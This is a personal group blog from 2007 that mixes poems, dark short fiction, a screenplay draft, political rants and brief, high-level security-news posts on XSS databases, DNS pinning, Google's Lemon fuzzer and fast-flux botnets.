pink dominion
I was thinking just yesterday
about the day before,
about how I'd sat in the kitchen
and waged war on the floor
with a sorry brow pulled even lower
over my molten eyes on fire.
but I wasn't crying,
I had extinguished sight,
I explained to myself, as two
who came late to the fight
held their tiny helmets tight;
running clumsy after a toy red truck.
of all the 4 alarm thoughts
I'm condemned to recall,
it just had to be that one.
The one where you call
and say three magic words:
How've you been?
Your pink dominion
could be lifted
off my wasteland chest,
I could breathe again
independently
and no longer just dream
of sleep.
7.31.2007
pink dominion
7.30.2007
Grizzley Tate's Great Grape Experiment
Grizzley Tate's Great Grape Experiment
By Berling Chesterfield
When I was eight I met a kid named Grizzley Tate. Grizzley wasn't really his first name, but all the other kids called him that because he was big and fat and made noises like a bear when you tried to tickle him. He didn't like being tickled, but all the other kids tried anyway. I guess they thought it was funny.
After a year of being made fun of and tickled I guess Grizzley realized he wasn't going to make any friends, so he decided to take up a business plan. He figured if the other kids wouldn't be his friends, at least they could be his customers. He set up a lemonade stand in the front of the school and sold water loaded with sugar and freshly squeezed lemon before class for 50 cents a cup. To get a leg up on the competition he originally served the lemonade in special edition drinking glasses with cartoon characters on them that he'd collected from years of eating the popular marshmallow cereal 'Smushy Puffs' and saving the box tops. After a while the kids just started taking the glasses, though, and his entire collection was gone in a matter of two weeks. I still have three in my kitchen cabinet.
One day the best kickball player at school, Brent Graffin, bought a glass of lemonade with 50 cents he'd stolen from another kid, Jared Mosher. Jared had big thick black glasses and went legally blind when he was fifteen. Back then he could still see pretty good, though. Brent took a big sip of the lemonade in front of his friends and then declared, "This lemonade tastes like pee!" and then spit it in Grizzley's face and poured the rest of it all over Grizzley's overalls. It looked like he'd peed his pants and the strong stinging smell of the lemonade under the hot sun only made it worse. Brent told everyone he scared Grizzley so much that he pee'd his pants and for a couple weeks everyone called Grizzley "big ole pee-pants Tate." Of course, that was a slightly clunky nickname for eight year olds to say and it never really stuck.
When I was nine I was friends with Grizzley for a few weeks during the summer. Our mothers were friends from work and my mom invited both of them over for lunch some days. Our moms would drink wine and talk about local politics while Grizzley and I would draw and listen to cassette tapes of the Beach Boys. On a particularly boring day in July, I was jumping on the trampoline in my neighbor's yard and trying to see how far I could throw a tennis ball from ten feet up in the air. My initial delusions of rocketing a tennis ball all the way across Mudville and into the neighboring town were quickly dashed. I was just sitting on the trampoline and looking at a tree when Grizzley came over and told me he had a great new idea.
Grizzley told me he had a plan to start selling grape juice to the kids at school in the Fall, and needed my help to start making juice so he'd have enough supply for the demand by the start of the school year. We went to the store and bought as many grapes as we could afford with the change from Grizzley's piggy bank, and rode our bikes to the big open field next to the power plant. There were empty barrels left scattered about the field and Grizzley said they'd be perfect for making grape juice in. He emptied all the grapes into two barrels that were set up next to eachother, then took off his shoes, hopped in, and started stomping. It looked like a lot of fun and Grizzley wore a horrible little grin on his face while he slushed about, giggling. I hopped in the other barrel and started stomping away as well, thoroughly soaking my new white shorts and undershirt in grape guts and juice. After a while of stomping Grizzley pulled out a bag from his backpack filled with small red berries he'd collected from all around the neighborhood and said they were his secret ingredient.
I came home that night covered head to toe in purple. My mother was laying on the floor crying when I opened the door, and her low sobs became screeching wails when she set her red, puffy eyes on me. She beat me so bad I was even more purple, and forbade me from bathing for two weeks so the neighbors wouldn't see the bruises. She called Grizzley's mother a whore and said I was never to see him again. It didn't bother me much.
Grizzley Tate was run over by a train late that August. People said he did it on purpose, but I don't think so. He was really excited about the prospect of business in the upcoming schoolyear, and I don't even think he knew how to tie sailor's knots.
SOA security
The title of Joe McKendrick's most recent blog post over at ZDNet caught my eye, "Is Security the SOA Showstopper". First, this interested me simply because I love security, secondly, at my current summer internship I'm doing a lot of SOA work with Web Services and implementing use of the SOAP protocol for communications with a SQL database. Unfortunately for my sake it doesn't look like I'm going to get to do much WS security work simply because the summer is winding down but I still find it really interesting to read about considering it's the next generation of security research. Joe in his blog goes on to state..
"SOA increasingly addresses services on both sides of the firewall, and therefore opens up the most critical business processes and data to outside intrusion. As frequently mentioned in this blogsite, there’s more convergence with Software as a Service and Web 2.0 — which open up things even more to outside influences."
Joe also references a recent report from InformationWeek titled SOA Security: One Treachorous Journey.
word of the day
palpable (adj) - 1. readily or plainly seen, heard, perceived, etc. Synonyms: obvious, evident 2. capable of being touched; tangible.
7.28.2007
civil nuclear cooperation
The U.S. and India have just reached a deal regarding nuclear cooperation for "civil purposes".
"The conclusion of negotiations on this agreement marks a major step forward in fulfilling the promise of full civil nuclear cooperation as envisioned by President Bush and Prime Minister Manmohan Singh," said U.S. Secretary of State Condoleezza Rice and Indian Foreign Minister Shri Pranab Mukherjee in a joint written statement.
The new civil nuclear cooperation between the two countries will "offer enormous strategic and economic benefits to both countries, including enhanced energy security, a more environmentally friendly energy source, greater economic opportunities, and more robust non-proliferation efforts," the statement said.
For those not entirely capable of reading between the lines, this is simply a response to the Iranian & Russian nuclear deal. Now we have a nuclear ally in the eastern hemisphere, in close proximity to both Iran and Russia.I'm not really sure how to respond to this. I really can't argue the reasoning behind the deal or the current administrations thought process. It's just unfortunate our world has come to this, where nuclear technology is the end all be all. Those seeking power wish to do so by means of fear. Nuclear fear.
Human nature is a bitch. We're going to destroy ourselves ;]
7.27.2007
insider threat security: technology and policy
I just recently finished reading "Enemy at the Water Cooler: Real-Life Stories of Insider Threats and Enterprise Security Management Countermeasures" by Brian T. Contos. I decided to read Contos's piece after reading a promising review on Slashdot. I was really hoping I might be able to use some of the material as reference for a paper or two this year in graduate school, but unfortunately that doesn't appear to be the case.
I can basically sum the book up in a single word...."eh". It wasn't terrible but at the same time wasn't providing any earth shattering information. None of the ideas or concepts were new or original which was somewhat frustrating considering the Slashdot review was so positive. Instead, it was a simplistic, low level summary of what most in the information security field should already know. However, Contros does manage to salvage the book with a number of in depth case study analyses of companies and organizations playing the victim to insider threats.
Anyway, after reading Contros's book it made me think back to a paper I had written for an information privacy class last year. The paper discusses a number of technical and policy issues surrounding a hypothetical insider threat scenario from both the perspective of the attacker and victim. I figured I might as well take a minute to post it on here for your viewing pleasure. However, it should be noted, at the time I wrote this paper I was unaware at how common insider threat cases were, and mistakenly state something along the lines of "this hypothetical scenario is a rarity" when in fact insider threat scenarios are very common. Please disregard my prior ignorance ;]
-------------------------------------------------------------------
Introduction
Next, it is interesting to focus on hypothetical scenarios regarding information privacy, technology, and governance. These scenes enable the reader to grasp a comprehensive sense of what roles technology plays in obtaining and protecting private information. The first scene discusses a scenario from the perspective of a malevolent person using a technological tool to access unauthorized private information. The following scene discusses the scenario from the perspective of the victim and how he/she may potentially use technology as a means to protect private information. Additionally, it will be interesting to see the role governance and regulation play in the two different cases. By focusing on each scene and seeing things from both perspectives, one can obtain a better understanding of what roles technology plays regarding privacy issues.
Scene 1 – The Attacker’s Perspective
Large organizations like the hypothetical organization, “Digital Enterprises”, store massive amounts of private client data. Often time’s large organizations such as these are the target of attacks. First, it is because these companies have private, sensitive information that outsiders want access to. Second, the connectivity and networking ability of the Internet enables users to develop, use, and distribute software creating a jungle like environment where anything can happen. “We refer to this situation as computation in the wild, by which we mean to convey the fact that software is developed, distributed, stored, and executed in rich and dynamic environments populated by other programs and computers, which collectively form a software ecosystem” (Park and Willinger).
Technology in this case provided Bob with a gateway to access private information he normally wouldn’t be authorized to. But is technology really to blame? “Privacy is fundamentally about the power of the individual. In many ways, the story of technology’s attack on privacy is really the story of how institutions and the people who run them use technology to gain control over the human spirit” (Garfinkel 5). I think it is important to understand that technology is being used as a tool to obtain private information. Technology by itself does not violate our privacy. The blame should not be placed on technology but rather on the people using it maliciously.
Governance Issues regarding Scene 1
Along with technology, it is equally interesting to focus on lawful governance issues that closely relate to the scene. Once Bob has access to the company database he has access to all of the company’s client data. Let’s say Bob wasn’t solely interested in credit card numbers, he may also have access to client addresses, client purchase information, client phone numbers, client billing information etc. These all bring up a number of lawful governance issues worth looking into.
Scene 2 – The Victim’s Perspective
Technology Issues regarding Scene 2
Governance Issues regarding Scene 2
confessions of a middle school dropout
confessions of a middle school dropout
by Berling Chesterfield
I didn't have an unhappy childhood.
I remember when I was growing up
my friends and I would hike deep
into the thick woods, until we couldn't
see where we came in anymore, and we'd
set up camp fires, sit around for a few hours,
and then put the fires out. Sometimes
we'd forget to put them out and they'd start
wildfires. I don't remember too much
about those times, though.
I did a lot of drugs when I was nine.
My father was a night dancer and
my mother was an accountant.
They'd go years at a time without
seeing each other.
They were very happy.
My mother would come home around six
and my parents would loudly make love
with blindfolds on for about an hour,
until it was time for my father to go dance.
I had two babysitters, a day sitter and a night sitter,
and I was sexually 'educated' by both.
They used to throw lit cigarettes at me
and tell me to "dance like your daddy."
The two sitters didn't know each other
and never met, so I don't know how they
both knew to do that.
On hot summer days I'd go swimming
at the man-made lake next to the power plant.
I'd swim out to the middle and wade for hours,
imagining I was lost at sea. I subsequently
developed a very muscular upper body.
I had a girlfriend for a month when I was 17.
She said I smelled bad one day so I spit in her
hair and told her I loved her.
She punched me in the gut and called me a loser.
I really did love her, too.
generation woah
generation woah
woah is me.
woah, am i?
listings on tv:
be my guide.
smoking fraggle rocks,
raised by joeys glad, stoned.
distant dictators declare
an answer: just say woah.
hey dudes, here's what i know:
family matters. partial guardians
up and split, become remote,
remain civil, splinter the holidays.
we, the allied loners
holding close our remotes,
fear a future civil dispute
pitting step-brother against step-brother.
7.26.2007
alchoholic synonymous
alcoholic synonymous
hi, my name is
mine
for all
time.
long past the lives of loved ones
(former, fake, otherwise),
when strangers have forgot
the placement of my plot,
my headstone will erode,
travel down and be washed out,
sinking in increments
into the sea.
Those pebbles
will still be mine.
and they'll collect
at the cold below,
becoming future mountains
beneath silver waves.
My fitting end,
and if memory
serves anything -
mine will stay in stone,
knowing all I know
about the building
of something
no one could see
but me.
gov't...sometimes u need to stay out of our lives
according to a number of US senators, parents aren't quite doing the best job at performing their parental duties. as a result, the government has decided it is in everyone's best interest to have them step in and parent the children of today's information age.
"US senators today made a bipartisan call for the universal implementation of filtering and monitoring technologies on the Internet in order to protect children at the end of a Senate hearing for which civil liberties groups were not invited."
first off, i applaud you, US senators, for not inviting civil liberties groups to this hearing. they may have voiced a different opinion disagreeing with yours and probably would have offered varying perspectives on the issue. this whole idea of listening to many and obtaining a more thorough, comprehensive understanding of the issue would have been a time consuming inconvenience. obviously you, the members of the US senate, know what is best for all members of our society.
secondly, i think it's wonderful we're taking the necessary steps to create our own great firewall similar to that of communist China. that's done wonders for their country and i'm sure we'd see similar results over here.
lastly, taking the parental duties from parents to monitor what their own children are doing is a step in the right direction. parents shouldn't have a say in how they go about raising their own children anyway. obviously you, the government, can do a much better job. i mean come on, it worked for the Hitler Youth and Nazi Germany right?
word of the day
taciturn (adj) - habitually reserved in speech; inclined to silence. Synonyms: silent, reticent.
what is kenny saying??
ever wonder what kenny from south park is saying in the song from the opening credits under his muffled speech??? it's not exactly PG material...
"Kenny's lines in the song, like the rest of his speech in the show, are muffled by his parka hood, which covers his entire face except for his eyes. However, Kenny's lines have been revealed by South Park Studios. In seasons 1-2, he says "I love girls with big fat titties, I love girls with deep vaginas." From seasons 3-5 he says "I have got a 10-inch penis, use your mouth if you want to clean it." From season 7 to the first half of season 10, Kenny says "Some day I'll be old enough to stick my dick in Britney's butt." The current lines are not known ."
7.25.2007
House of Slush
CU INSERT:
A large white styrofoam cup that reads 'House of Slush' sits against a red brick wall.
EXT. BACK ALLEY - DAY
A low flying plane rumbles loudly overhead on a hot, hot sunny day. Conversation and coughing can be heard coming from further down the alley. The camera pulls out as the cup begins to rattle. A sound of claws and fur against styrofoam is heard as the cup begins to shake back and forth with increasing force. Finally, the cup tips over and an orange three-legged RAT, covered in slushie, scampers out.
The rat hurriedly hobbles down the alley past two pairs of dirty white shoes. The camera pans up to reveal two young men wearing brightly colored shirts with black aprons, smoking a joint and talking. The young man on the right, white - early 20's, exhales a giant plume of smoke and leans back against a propped-open bright orange painted metal door marked: No Entrance. He is BEN.
A large white styrofoam cup that reads 'House of Slush' sits against a red brick wall.
EXT. BACK ALLEY - DAY
A low flying plane rumbles loudly overhead on a hot, hot sunny day. Conversation and coughing can be heard coming from further down the alley. The camera pulls out as the cup begins to rattle. A sound of claws and fur against styrofoam is heard as the cup begins to shake back and forth with increasing force. Finally, the cup tips over and an orange three-legged RAT, covered in slushie, scampers out.
The rat hurriedly hobbles down the alley past two pairs of dirty white shoes. The camera pans up to reveal two young men wearing brightly colored shirts with black aprons, smoking a joint and talking. The young man on the right, white - early 20's, exhales a giant plume of smoke and leans back against a propped-open bright orange painted metal door marked: No Entrance. He is BEN.
The young man on the left, teenage - puerto rican and overweight, stares dead ahead with a stupid grin on his face. A full ten seconds passes before he looks over to see the rat that had passed still hurrying down the alley and into the street. He opens his mouth slightly and curls his upper lip. This is CELSO.
CELSO
Dude...
Ben takes another drag and slowly raises his eyes over to Celso.
CELSO
That fuckin' rat bogarted my slushie.
BEN
fuckin' rat.
CELSO
(in Cagny-speak)
Youuuu dirty rat...
The two release low, slow giggles. Ben flicks the joint and follows Celso back inside. The bright orange door slams behind them.
INT. HOUSE OF SLUSH - DAY
Celso puts on a hair net and gloves, and settles himself behind a sandwhich preparation station. He stares dumbly at the various bins of ingredients and smirks. He looks up through the window from the kitchen and into the main storefront as Ben walks by. Ben puts on an oversized black hat with a slushie on it, pulls it low over his eyes, and takes a stance at the register.
Standing a few feet away from Ben, picking at his nails and humming to himself is FRED. He's very overweight, spanish, and has greasy slicked-back black hair. He speaks with a thick accent without looking up.
FRED
(wrinkles his nose)
Joo know you reek, right? Joo smell like my cousin's house back in Tijuana. The smell of confused young boys.
BEN
Confused young boys, eh? A smell you're all too familiar with, I'm sure. What are you implying, Fred - was that your way of asking me out? By the way I think you've got a little something.
Ben motions to his nose. Fred wipes at light white powder bordering his nostrils and examines it in his fingers. He shrugs and turns away as he rubs his finger against his gums.
FRED
Joo know I don't go after wise-ass little boys like you and your acid-head friend back there.
Celso drops a large slab of cut turkey in the back. It slaps loudly on the cold linoleum floor. He looks around guiltily and then kicks it under the prep table.
FRED
I like big, strong, mature men. Cultured men.
BEN
with big, strong wallets.
FRED
and even bigger dicks.
A few of the businessmen making up the customer group in the inside seating area glance up from their papers curiously. One lowers his sunglasses while taking a sip through a straw, all in one smooth motion.
Fred clears his throat and goes back to picking at his nails.
A bell above the door rings out as a man wearing too much makeup and a dress walks through the door. He sashays up to the register, looking past Ben and over to Fred.
MAN IN DRESS
Alloo Freddy boy
FRED
Oh Jesus. Hello Matthew.
MATTHEW
I did not see you at The Mantle last night. Where were you? I missed you.
FRED
Oh, last night? What was that? Tuesday night? Oh Jess, I was with my boyfriend last night.
MATTHEW
You silly, I know you don't have a boyfriend, Freddy. Why do you lie to me?
FRED
Oh, Well - I mean I was with my girlfriend last night. I put my penis in her vagina. It was very enjoyable.
Matthew frowns at Fred. He huffs softly, swings his purse, and takes a seat at a table.
Fred smiles devilishly and, after waiting a short while, walks over to the table Matthew is at and sits down.
The bell above the door rings again, and in walks a cute young blonde girl with her hair in a ponytail, wearing bright orange running shoes. She looks around the room at the various businessmen eating sandwhiches and slushing away, and then walks up to the counter.
CUTE GIRL
Umm.. Yes, I would like a green apple slush and a small salad.
BEN
All our salads are the same size.
CUTE GIRL
Oh, well. What is the size?
BEN
Rather large.
CUTE GIRL
(frowning)
I'll just have the slush, then. Well, ok fine give me the salad too. I'll be outside.
Ben nods and completes the transaction. The girl walks out and Ben stares at her as she does, transfixed by her running shoes. He then walks back to the kitchen and finds Celso eating the ketchup out of the container with a spoon. He grimaces and hands him the order.
EXT. HOUSE OF SLUSH PATIO - DAY
Ben walks out of the front door holding the slushie and large salad. His apron flaps in the light warm breeze. He walks up to the table the CUTE GIRL is sitting at. She's reading a book. She puts it down and looks up when he comes over.
BEN
Here ya go. Sure is hot out here.
CUTE GIRL
Sure is.
BEN
Yep.. sure is.
There is the inevitable awkard pause.
BEN
So, would you like to see a movie sometime?
CUTE GIRL
Um, with you? like on a date?
BEN
In theory, yea.
The girl pauses for a moment, trying to appear flustered - but she's not. She's looking over Ben and analyzing the situation.
CUTE GIRL
Oh, well - I would, but I have a boyfriend.
BEN
Oh, yea - sure. That's cool. It's kind of a rule of mine not to date girls who have boyfriends, anyway. So that works out. Enjoy the slush.
Ben turns and hurries back, apron flapping. He holds it down as he walks, then pauses before he opens the door - thinking.
BEN
Don't drink it too fast!
But as he speaks a loud car races by and the CUTE GIRL doesn't hear. She just sees him say something. She smiles politely and waves. Ben waves back, embarrassed.
BEN
(under his breath)
Rats...
Ben opens the front door and walks in.
INT. HOUSE OF SLUSH - DAY
Ben resumes his spot at the register and stares down at the keyboard, dejected. Fred, still sitting with Matthew, laughs loudly at his own joke and Matthew huffs and looks away.
Celso shuffles audibly up to the register and taps Ben on the shoulder.
Celso
Bud?
Ben looks at Celso curiously, considering the question, and after a moment turns and follows him back to the bright orange metal door.
politics smolotics
My conservative father recently added me to a political email list that he and is GOP lovin' cronies enjoy ranting on. I myself and my cousin are the only liberal minded thinkers on the list and are attacked hourly by these old, close-minded dinosaurs.
So anyway, myself and my email list adversary, Jimmy, have had a number of issues. If I ever say anything, Jimmy is always the first to respond with some stupid response like "terrorism is bad". It doesn't matter what we're talking about, could be gay rights, abortion, health care; Jimmy will always remind me that terrorism is in fact bad. Thank you Jimmy. For this knowledge I remain always indebted to you. Below is Jimmy and my most recent discussion....
----------------------------------------------------------
Jimmy: my party defended our country when attacked, your's looked the other way and won't finish the war as it is not in their political best interests, that's politics.
my party protected citizens, your party protects the enemy
Me: "my [jim's] party protected citizens"
Now at which point was your party protecting US citizens? Was it when "your" party's leader led our nation into war under false pretenses? or when "your" party's leader used the Patriot Act (patriot act, what a great name) as a deceitful facade to strip US citizens of their civil liberties?
And claiming the Dems protect the enemy and support terrorism is just ridiculous. Using some bogus statement like that revokes all credibility from a potentially worthwhile discussion.
Jimmy: Doug (my first name isn't l33t0 believe it or not),
Do you think that 911 was a act of war?
Do you think our response was to strong when we decided to remove from power a cronic dictator who would if he could attack us while expanding his own boarders through war against other Middle East counties?
Do you think the fact we haven't had an attack on our soil since is because of luck?
Do you think W wanted to attack Iraq for other reason's than our national security?
If W is successful, he will be one of if not the greatest presidents of your life time as viewed by history, not editorial boards, remember Lincoln? he wasn't to popular at the time, nor were his decision without pain and much blood, but our country is far better off, so will the middle east be if and when Iraq can bleed out their internal religious differences just as we have had to do here. The US is the ONLY superpower because of freedom, freeing the Iraqis’ can birth a similar vision that may with much pray lead to religious tolerance that could effectually spread through out the world.
Me: 1. Do you think that 911 was an act of war?
Yes, but who attacked us, Osama bin Laden and Al-Qaeda or Saddam and Iraq? Following 9-11, fear of terrorism reached a climatic point. The United States public looked to our leader, G.W, seeking answers. We, the United States public following 9-11 were incredibly impressionable and impulsively looking to respond. So Bush deceived us and told us Iraq had weapons of mass destruction, well aware the public would support him in accomplishing what both he and his father wanted to do for years, remove Saddam from power.
2. Do you think our response was to strong when we decided to remove from power a chronic dictator who would if he could attack us while expanding his own boarders through war against other Middle East counties?
Now here we agree. Removing Saddam was a good thing, in fact the highlight of the war (which you Bush supporters love to cling to despite all his other failures). But was it necessary to deceive the United States public, and exaggerate non-existent links between Saddam and Al-Qaeda? Was it necessary to make false claims regarding weapons of mass destruction? Was the timing in going after Saddam really the best considering we were just attacked by Al-Qaeda and not Saddam's Iraq? Doesn't it make you the least bit uneasy knowing your leader deceived you, our country, in a time of need like no other in US history following an attack of such magnitude on US soil?
3. Do you think the fact we haven't had an attack on our soil since is because of luck?
Let me tell you what I do think. I certainly believe there are a number of sleeper terrorist cells in our country waiting to be activated. I certainly believe another attack on US soil is inevitable considering our current administration's handling of worldly affairs. I certainly believe (as Phil has said) that your logic/argument masked under this question is incredibly weak. Once this unavoidable attack does occur what do you have to fall back on?
Has the color coded terror alert scheme given you solace in believing that our government is really on top of the ball, well aware of and able to prevent future terrorist attacks (http://www.terror-alert.com/)? As of right now, we're in the yellow, "significant risk of attack"...they must obviously be in the midst of combating this potentially "significant risk".
To conclude, yes Jimmy I believe we have been lucky thus far that an attack on US soil has not yet taken place since 9-11.
4. Do you think W wanted to attack Iraq for other reason's than our national security?
Again, was it really the right time to invade Iraq? What about Iran? Why didn't Bush lie to us about Iran having weapons of mass destruction and take military action there? Oh right, because he wouldn't have been lying, instead he would have actually been telling the truth. Putin and the Russians have been aiding Iran in developing nuclear technology for some time now. Wait a second, isn't Iran a nation that harbors a significant number of Islamic fundamentalists who would love to launch a nuclear strike on US soil? Isn't that a more important matter of national security????
5. If W is successful, he will be one of if not the greatest presidents of your life time as viewed by history, not editorial boards, remember Lincoln? He wasn't to popular at the time, nor were his decisions without pain and much blood, but our country is far better off, so will the middle east be if and when Iraq can bleed out their internal religious differences just as we have had to do here.
"If W is successful"...again your logic is weak. You're not going to win an argument/convince me of anything with hypothetical rhetoric. Putting Lincoln in the same sentence as G.W is laughable. G.W is the modern day Harding and that's being generous.
Lincoln fought a war to keep our country (emphasis on OUR country) unified and to end slavery. Much blood was shed in response to a just cause. G.W on the other hand has been fighting a war in vain. What if your son or daughter was being deployed back to Iraq for his/her third or fourth tour? Would you still support sending even more troops over to fight? Would you want your child risking his/her life on yet another tour of Iraq when even the Iraqis don't want us there?
And chances are Iraq won't bleed out their internal religious differences anytime soon. And if we, the US, want to try and solve their internal religious issues we might as well get involved with the Israelis and the Palestinians while we're at it. I'm sure we can provide the means and reasoning to solve THEIR religious issues that stem back for hundreds of years.
Jimmy: Terrorism is bad.
7.24.2007
the illuminati made me late for work
the illuminati made me late for work
wide eyes staring wild.
digital discomfort. dark
under semi-circles hugging.
unusual suspects flash,
actual perps buried alive,
deep in dead memory.
the sun is burning
while i'm bending
like light through a wine glass.
the end is starting
over. I'm in them,
viscus visions of last night.
black dash speeding back.
masking mist. message
received upon waking:
'I'm hurt. what happened?'
my reply, an aside: 'It's broken.'
word of the day
esoteric (adj) - understood by or meant for only the select few who have special knowledge or interest; Synonyms: arcane.
7.23.2007
ghosts don't breathe
ghosts don't breathe
to learn, first,
one must
understand learning.
a slick wick
knows only
patience and burning.
but being sees
holy ropes
unravelled threadbare.
our grating fates
reveal appeals:
am I anywhere?
XSSDB
so there's a new updated XSSDB at gnucitizen. it's quite badass i suggest you check it out, here's a screen shot below...
7.21.2007
Ever want to change the world?
Ever want to change the world? An easy question right? Yes or no. No variables. No ambiguity. Do YOU want to change the world, for better or for worse.
Life was meant to be lived…so profound, I know. But sometimes we all become so consumed with the bullshit we forget what’s really important. Family, friends, relationships, love, hate, happiness, sadness, independent thought.
When you’re happy, you’re happy. When you’re sad, you’re sad. When you’re in love, you’re in love. When you’re in lust, you’re in lust. But you’re living, you’re always living life. You’re always capable of changing the world. We’re always capable. We are life. Life is us. I want to change the world.
7.20.2007
Google expiring cookies earlier to improve privacy
Google has recently taken a step forward in attempts to improve privacy for those using their search engine. I don't know if I'd necessarily call it a full blown "step", more like a tip-toe in the right direction...however, the fact that they've done anything at all is comforting.
"After listening to feedback from our users and from privacy advocates, we've concluded that it would be a good thing for privacy to significantly shorten the lifetime of our cookies — as long as we could find a way to do so without artificially forcing users to re-enter their basic preferences at arbitrary points in time. And this is why we’re announcing a new cookie policy.
In the coming months, Google will start issuing our users cookies that will be set to auto-expire after 2 years, while auto-renewing the cookies of active users during this time period. In other words, users who do not return to Google will have their cookies auto-expire after 2 years. Regular Google users will have their cookies auto-renew, so that their preferences are not lost. And, as always, all users will still be able to control their cookies at any time via their browsers."
DNS Pinning
In recent months DNS Pining has been the primary topic of discussion amongst security researchers. Darkreading reports that at the upcoming Black Hat USA conference DNS Pinning will be covered extensively by security architect David Byrne. This type of attack can absolutely cripple an organization by enabling attackers to bypass firewalls and access the thought-to-be inclusive company Intranet.
Basically DNS Pinning allows an attacker to bypass an organization's firewall by fooling the "same origin policy". The "same origin policy" is used to restrict access to the Intranet from requests being made from the outside Internet. Instead of me wasting time trying to explain how the attack works in depth, you're better off checking out Christ1an's write-up. He does a great job explaining the HTTP requests made and provides thorough graphical representations of how the attack works. It's a pretty complex attack and might take a couple of read throughs to fully grasp the concept.
word of the day
lugubrious (adj) - weighty, mournful, or gloomy especially to an excessive degree. "Jake's lugubrious monologue depressed his friends."
7.19.2007
face-f*ck my heart
face-f*ck my heart
by Berling Chersterfield
clumsy clod caught choking on air.
he clumsily clawed underwater
at ropes holding a submerged bridge.
blaming the cigarette for the clouds,
I let the AC smoke it for me.
in a condition of pure falling
up and down: falling up with
a fell swoop at seeing the shine.
letting my skin burn and grow
new; dull and shiny, catching light
like fresh plastic. chemicals
matter to chemists, but
the slob's sleeves disarm his
intended attraction.
i walked backwards, in time, watching
you a few hours ago: you were different.
home grown google XSS fuzzer
apparently google has developed there own XSS fuzzer "Lemon", however they have no plans of releasing it to the public...
"How about an automated tool for finding XSS problems in web applications? Our security team has been developing a black box fuzzing tool called Lemon (deriving from the commonly-recognized name for a defective product). Fuzz testing (also referred to as fault-injection testing) is an automated testing approach based on supplying inputs that are designed to trigger and expose flaws in the application. Our vulnerability testing tool enumerates a web application's URLs and corresponding input parameters. It then iteratively supplies fault strings designed to expose XSS and other vulnerabilities to each input, and analyzes the resulting responses for evidence of such vulnerabilities. Although it started out as an experimental tool, it has proved to be quite effective in finding XSS problems. Besides XSS, it finds other security problems such as response splitting attacks, cookie poisoning problems, stacktrace leaks, encoding issues and charset bugs. Since the tool is homegrown it is easy to integrate into our automated test environment and to extend based on specific needs. We are constantly in the process of adding new attack vectors to improve the tool against known security problems."
mountains named after people
I'm working right now. I've managed to fill up the first 3 hours somehow, without even cracking open my book. I usually wait until later in the afternoon to be so blatently not doing anything pertinent for the company. Apparently some of the bosses who are in Hawaii right now come back next week, so that scares me a little bit.
I think we're going to the mall at lunch, but I'm currently broke as a joke so I'll be relegated to the position of consumate window shopper (i used the word 'consumate' in a post last week too, i hope no one notices). I just noticed some really weird painful bump on my right hand, on the knuckle. I have no idea what it is or could be - the possibilities include: bug bite, spider bite, wart, or maybe the flesh eating disease. none of those sound fun (especially warts, yuck).
If i ignore it, it'll go away. That's something I've learned from the people I go away from.
The rest of the afternoon will be spent eating fun-size twix bars for sustenance, looking up the proper spelling of the word 'sustenance' but ultimately dismissing it and refusing to edit the post, drinking another can of diet mountain dew, and wondering why waking up early gives me stomache aches.
i use the word 'wonder' too much, but i'm not curious as to why.
word of the day
zeal (noun: zealot, zealoutry; adj: zealous) - enthusiastic devotion to a cause, ideal, or goal.
7.18.2007
pigment figments; rainbow ghosts
on another unsanctioned break I stood outside staring at the red brick wall of the building across from me and imagined myself as one of the dummies sitting in an invisible car hurtling towards the wall at a million miles an hour. it was sunny and nice outside.
shredding headlines: no paper trail of tears
so there's drama at the office over a regional manager of some bank and trust that came in, who was apparently some hot shot possible client. he came in yesterday and today and shot the shit with anyone who he could talk to about what they do at the company, how things are going, etc. he was told by management that we're doing 9,900 deals a month. according to the employees here I've talked with so far, the figure is closer to 100 a month, if it's a good month. this amount of deception doesn't sit well with me. after spending an hour reading about Hemingway, I went out to smoke a cigarette and think about some articles I had read on digg. One of them was about a former Reaganite who predicted the Bush administration would, within the next year, stage a false flag event, reinstate the draft, and declare a dictatorship. the next link I clicked was of a dog consoling a small boy.
finally I thought about a scientist's claim that if we don't colonize Mars in the next 50 years, humanity is doomed. I wonder, is it such a loss? as I walk back from the cigarette break (not during an official break period) I pass a row of large filing cabinets marked "deceased" and wonder what's inside.
What’s ‘fast-flux’?
I’m disappointed in myself for having never heard the term ‘fast-flux’ before until about ten minutes ago when I came across this. Despite the fact this concept is relatively new (about a year old) I’m utterly disgraced with myself for having never heard of it.
So what is this ‘fast-flux’ all about? Basically fast flux is a malious-website-botnet-infrastructure concept type thingy. Understand? Wait, you don’t? That’s not quite the explanation you were looking for? Not quite clear enough? Somewhat vague? Are you sick of these rhetorical questions? Should I continue? Ok then…
Basically what I mean by malious-website-botnet-infrastructure type thingy is that infected bot machines, slaves, zombies, whatever you want to call them, act as proxies for malicious sites. The concept of fast flux simply means that these bot machines acting as proxies hosting the malicious site rotate continuously changing their DNS information enabling the site to circumvent an ISP’s IP block list.
I think this is really quite interesting and very clever. So how do security professionals stop this from happening? Well the only answer I can come up with for now is to better inform the Internet community about phishing sites and the danger of following ambiguous links. Kind of a weak answer, I know, but it’ll be interesting to see what happens.
work, drugs, and love
Ok so I have a job now. But I don't have a car like I had anticipated (because l33to's parents passed a lemon off to me and now i'm stuck with the damn thing - those shysters.) I'm at my second day on the job right now, and so far I've learned a little bit about how the company works, but past that I'm completely incapable of doing any assignment or work that anyone (do i have a boss?) might give me. I've been pretty much just sitting around, surfing the net (as I used to do way back in the day... I've since become pretty self-sufficient in my entertainment harvesting, however I feel that's more due to the immense boredom I feel at the prospect of doing anything). I check a couple sites, but I only really get a good half-hour of things I'm interested in, and the rest I'm just clicking links hopelessly, hoping to stumble upon anything to keep me busy for at least 3 more minutes (and yes, i am aware of the website 'stumbleupon').
My mental state is slowly stabilizing since yesterday, as I nearly had a complete meltdown in the car ride home last night from my first day. I'm death obsessed and I can't get over my ex-girlfriend who has repeatedly treated me with complete indifference, and whose great parting gift to me was "get a grip." Maybe I do need to get a grip. No i definitely do. But I really don't know how I'm going to get it. I've sworn to myself to forget all about the past and just move on. Easier said than done, but I've done a good job at leaving myself no choice by acting as mentally unstable as possible for the majority of the last week.
